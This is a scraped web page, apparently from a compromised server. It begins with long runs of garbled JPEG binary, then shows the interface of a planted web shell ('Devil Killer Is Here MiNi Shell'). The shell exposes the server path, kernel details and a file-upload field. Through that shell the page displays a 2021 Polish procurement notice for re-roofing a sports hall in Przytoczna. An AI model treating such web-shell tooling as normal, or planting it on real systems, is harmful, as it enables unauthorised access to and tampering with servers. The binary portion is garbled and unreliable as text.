JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210720/0012043301-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00120433 z dnia 2021-07-20</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja hali sportowej w m. Przytoczna – ETAP I - remont pokrycia dachowego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Przytoczna</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 21096682300000</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rokitniańska 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Przytoczna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-340</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL431 - Gorzowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">957494310</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">957489113</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@przytoczna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.przytoczna.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja hali sportowej w m. Przytoczna – ETAP I - remont pokrycia dachowego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8d3fd583-e923-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00120433</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003403/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Modernizacja hali sportowej w m. Przytoczna – ETAP I - remont pokrycia dachowego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu środków<br/>komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą<br/>elektroniczną (Dz.U. z 2020 r. poz. 344), a mianowicie:<br/>1) miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/,<br/>2) ePUAPu dostępnego pod adresem: https://epuap.gov.pl/wps/portal<br/>3) poczty elektronicznej pod adresem e-mail: ug@przytoczna.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących<br/>formularzy: złożenia, zmiany, wycofania oferty oraz do formularza komunikacji. <br/>2. Maksymalny rozmiar<br/>plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany,<br/>wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB. <br/>3. Wymagania techniczne<br/>i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów<br/>i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie<br/>korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług<br/>administracji publicznej (ePUAP). <br/>4. Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z miniPortalu, określone w Regulaminie<br/>korzystania z miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień<br/>tego Regulaminu. <br/>5. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP lub datę wpływu na adres poczty<br/>elektronicznej Zamawiającego (decydujące znaczenie będzie miała data otrzymania wiadomości przez<br/>system pocztowy Zamawiającego). <br/>6. Dane postępowanie można wyszukać na „Liście wszystkich postępowań” w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania”. <br/>7. W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie oświadczeń (nie dotyczy składania ofert), wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia lub postępowania. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej (nie dotyczy składania ofert) na<br/>adres poczty elektronicznej: ug@przytoczna.pl. <br/>8. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem<br/>„Formularza do komunikacji” jako załączniki. Zamawiający dopuszcza również możliwość składania<br/>dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za<br/>pomocą poczty elektronicznej, na wskazany w pkt.8 powyżej adres email (nie dotyczy składania<br/>oferty). <br/>9. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów z dnia 30 grudnia 2020r w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz rozporządzeniu Ministra<br/>Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020r w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy. (Dz.U.2020<br/>poz.2415). <br/>10. Do porozumiewania się z Wykonawcami w sprawach związanych z postępowaniem<br/>uprawnione są następujące osoby: Joanna Czubkowska, tel. 881-935-499. 11. Szczegółowy opis<br/>przygotowania i składania ofert umieszczono w rozdziale XIII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016<br/>r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1. administratorem Pani/Pana danych osobowych jest Wójt Gminy Przytoczna z siedzibą ul.<br/>Rokitniańska 4, 66-340 Przytoczna.;<br/>1) Administrator wyznaczył Inspektora Ochrony Danych, z którym mogą się Państwo kontaktować we<br/>wszystkich sprawach dotyczących przetwarzania danych osobowych za pośrednictwem adresu email:<br/>inspektor@cbi24.pl lub pisemnie na adres Administratora<br/>2) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w<br/>trybie podstawowym bez negocjacji;<br/>3) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 ustawy Pzp;<br/>4) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>5) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisanych ustawy Pzp, związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego;<br/>6) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO;<br/>7) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w<br/>przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie<br/>dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających<br/>na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego<br/>postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z<br/>prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub<br/>konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia<br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej,<br/>lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>8) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>9) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IR.271.8.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia są roboty budowlane polegające na „Modernizacji hali sportowej w<br/>m. Przytoczna – ETAP I - remont pokrycia dachowego” w ramach Programu inwestycyjnego<br/>Lubuska Baza Sportowa na 2021 r. Przedmiot zamówienia obejmuje: a)przygotowanie<br/>(oczyszczenie) podłoża; b) gruntowanie; c) sprawdzenie i naprawa jakości połączeń płyt; d)<br/>aplikacja I-szej warstwy membrany; e) zbrojenie hydroizolacji na detalach konstrukcyjnych; f)<br/>aplikacja II-giej warstwy membrany; UWAGA! Dokumentacja projektowa dotyczy całości obiektu<br/>hali. Niniejszym przetargiem objęty jest wyłącznie ETAP I zadania, a mianowicie wykonanie<br/>remontu pokrycia dachowego. Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja<br/>projektowa stanowiąca załącznik nr 9 do SWZ. Załączony do SWZ przedmiar robót ma jedynie<br/>charakter pomocniczy, informacyjny. Wobec powyższego mogą występować rozbieżności<br/>pomiędzy ilością i zakresem prac wykazanych w załączonym przedmiarze robót, a ilością i<br/>zakresem prac do wykonania wynikających specyfikacji technicznej wykonania i odbioru robót<br/>oraz projektu budowlanego i projektu wykonawczego. Ilości i zakres prac wskazany w<br/>przedmiarze robót nie jest wiążący dla wykonawcy. Wymienione powyżej dokumenty oraz<br/>pozostałe dokumenty przetargowe będą używane, odczytywane i interpretowane według<br/>następującego pierwszeństwa: 1)umowa; 2)formularz oferty; 3)niniejsza SWZ; 4)dokumentacja<br/>projektowa: a) projekt budowlany; b) projekt wykonawczy;c)STWIOR, d)przedmiar robót jako<br/>dokument pomocniczy.<br/>2. Zamawiający informuje, że prace będą prowadzone na obiekcie czynnym. Wykonawca musi zorganizować prace tak by nie zakłócać funkcjonowania obiektu i zapewnić bezpieczeństwobjego użytkownikom.<br/>3. Jeżeli w SWZ oraz jej załącznikach podana jest nazwa własna (w tym w dokumentacji<br/>projektowej), to oznacza, że została użyta/podana przykładowo. Wykonawca może zastosować<br/>materiały lub urządzenia równoważne, lecz o parametrach technicznych i jakościowych takich<br/>samych lub lepszych, których zastosowanie w żaden sposób nie wpłynie negatywnie na<br/>prawidłowe funkcjonowanie rozwiązań przyjętych w dokumentacji projektowej. Oznacza to, że<br/>zamawiający dopuszcza zastosowanie materiałów równoważnych dla nazwanych materiałów i<br/>urządzeń, wymienionych w dokumentacji z zachowaniem ich wymogów w zakresie jakości.<br/>Przedstawione parametry przedmiotu zamówienia stanowią minimum techniczne i jakościowe<br/>oczekiwane przez zamawiającego i będą stanowiły podstawę oceny ewentualnych materiałów<br/>równoważnych. W przypadku przywołania w opisie przedmiotu zamówienia norm, ocen<br/>technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w<br/>art. 101 Pzp, zamawiający dopuszcza rozwiązania równoważne z opisywanym.<br/>4. Wykonawca zobowiązany jest do udzielenia zamawiającemu gwarancji jakości na całość<br/>wykonanych robót objętych umową na okres minimum 60 miesięcy. Uwaga: Wydłużony okres<br/>gwarancji stanowi jedno z kryteriów oceny ofert określonych w rozdziale XVIII ust. 4 pkt 2) SWZ.<br/>5. Ustala się okres rękojmi równy okresowi gwarancji udzielonej na przedmiot zamówienia.<br/>Udzielona gwarancja nie ma wpływu na roszczenia w ramach obligatoryjnego systemu rękojmi.<br/>Bieg gwarancji i rękojmi rozpoczyna się następnego dnia licząc od daty odbioru końcowego<br/>przedmiotu umowy lub od daty potwierdzenia usunięcia wad w razie ich stwierdzenia przy<br/>odbiorze końcowym. Zamawiający może dochodzić roszczeń z tytułu gwarancji i rękojmi także<br/>po upływie wyżej określonych terminów, jeżeli reklamował wadę przed upływem tego terminu.<br/>6. Przedmiot zamówienia należy wykonać zgodnie z obowiązującymi przepisami prawa, sztuką<br/>budowlaną, wiedzą techniczną oraz zawartą z zamawiającym umową.<br/>7. Zamawiający wymaga, aby osoby wskazane przez wykonawcę, które będą uczestniczyć w<br/>wykonywaniu zamówienia posiadały biegłą znajomość języka polskiego. W przypadku gdy ww.<br/>osoby nie będą posiadały biegłej znajomości języka polskiego na okres i dla potrzeb realizacji<br/>przedmiotu zamówienia wykonawca zobowiązany jest zapewnić tłumacza na własny koszt i<br/>własnym staraniem.<br/>8. Szczegółowy opis przedmiotu zamówienia zgodnie z pkt III SWZ.<br/>9. Wizja lokalna<br/>1). Zamawiający zaleca, aby przed złożeniem oferty odbyć wizję lokalną w miejscu gdzie mają<br/>być wykonywane roboty budowlane, tj. w Przytocznej przy ul. Polnej 17. Wizja nie jest<br/>obowiązkowa. Wizja zostanie przeprowadzona z udziałem przedstawiciela zamawiającego w<br/>języku polskim. Podczas wizji lokalnej wykonawcy będą mogli zapoznać się ze stanem<br/>obecnym/istniejącym miejsca realizacji inwestycji i jego otoczeniem. Udział w wizji lokalnej nie<br/>stanowi warunku udziału w postępowaniu (udział w wizji lokalnej jest dobrowolny).<br/>2). Nie skorzystanie z uprawnienia do uczestnictwa w wizji lokalnej przez wykonawcę nie może<br/>stanowić podstawy formułowania jakichkolwiek roszczeń. Ryzyka niewłaściwej oceny warunków<br/>istniejących w miejscu realizacji przedmiotu zamówienia obciążają wykonawcę.<br/>3). W celu umówienia wizji lokalnej wykonawcy zobowiązani są do zgłoszenia zamawiającemu w<br/>formie email na adres: ug@przytoczna.pl, tel. 881-935-499 nazwisk osób, które wezmą udział w<br/>wizji lokalnej. Wizja lokalna zostanie przeprowadzona w dniu 23.07.2021 r. od godz. 9.00.<br/>Planowany czas wizji lokalnej nie dłużej niż jedna godzina. Każda z osób chętnych do odbycia<br/>wizji lokalnej winna posiadać przy sobie dokument tożsamości i stawić się na godzinę 9.00 (czas<br/>rozpoczęcia wizji). Osoby spóźnione nie będą mogły żądać przedłużenia wizji lokalnej.<br/>Zamawiający podkreśla, że nie przewiduje zebrania wykonawców w celu wyjaśnienia<br/>wątpliwości dotyczących zamówienia, a w trakcie wizji nie będzie udzielał odpowiedzi<br/>dotyczących treści SWZ. Podczas wizji wykonawcy zobowiązani są do przestrzegania przepisów<br/>bhp oraz zaleceń zamawiającego, w tym związanych z zaleceniami sanitarnymi związanymi z<br/>Covid-19. Zamawiający nie pokrywa kosztów udziału wykonawców w wizji lokalnej, jak i ich nie<br/>ubezpiecza od jakichkolwiek wypadków, strat czy szkód związanych z wizja lokalną. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udzieli zamówienia wykonawcy, którego oferta nie podlega odrzuceniu, która uzyska największą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużony okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na<br/>zasadach określonych w rozdziale VIII SWZ, oraz spełniają określone przez zamawiającego<br/>warunki udziału w postępowaniu.2.O udzielenie zamówienia mogą ubiegać się wykonawcy,<br/>którzy spełniają warunki dotyczące:1)zdolności do występowania w obrocie gospodarczym:<br/>zamawiający nie stawia warunku w powyższym zakresie,2)uprawnień do 